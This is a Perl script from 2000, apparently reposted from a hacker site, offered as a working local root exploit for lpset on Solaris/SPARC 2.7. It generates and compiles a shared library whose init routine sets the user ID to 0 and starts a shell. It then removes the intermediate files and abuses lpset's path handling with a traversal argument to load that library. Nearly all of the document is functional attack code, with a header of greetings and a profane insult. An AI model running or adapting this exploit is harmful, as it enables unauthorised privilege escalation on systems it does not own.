#!/usr/bin/perl
#
# lpset Solaris/SPARC 2.7 local root exploit 
# script by slash / buffer0verfl0w security 
# <tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl>
#
# "lpset seems to use strcat to append paths (-r) 
# but there is a special case when /usr/lib/print/lib has to
# be present." -n0ir 
#
# The shellscript that n0ir coded didn't work for me so
# I kinda ported his exploit to perl and now it werks :)
# Propz to him for the initial version of the exploit.
# 
# Greets go to b0f, TESO, zsh, mdma, funkySh, s0ftpj,
# lcamtuf, Lam3rZ, Mixter, all the polish people coz
# they rock :)
#
# Fuck you to: p4riah, h0lmez

print "Exploit the vulnerability in lpset Solaris/SPARC 2.7 \n";
print "Coded by slash / buffer0verfl0w security \n";
print "<tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl> \n";
print "Initial exploit version by n0ir \n";

print "Creating boomshell...\n";
open O, ">boomshell.c" or die "open(boomshell.c..)";
print O<<_EOF_;
#include <stdlib.h>
#include <unistd.h>
void
_init(void)
{
        setuid(0);
        system("/bin/sh");
}
_EOF_
close O;

print "Compiling boomshell ...\n";
`gcc -fPIC -c boomshell.c -g -DSOLARIS -Wall`;
`ld -G -o boomshell.so boomshell.o -ldl`;

system("chmod 755 boomshell.so");
system("rm -f boomshell.c");
system("rm -f boomshell.o");

system("/usr/bin/lpset -n xfn -r /../../../..$PWD/boomshell boomshell");

# EOF
#                   www.hack.co.za   [6 September 2000]#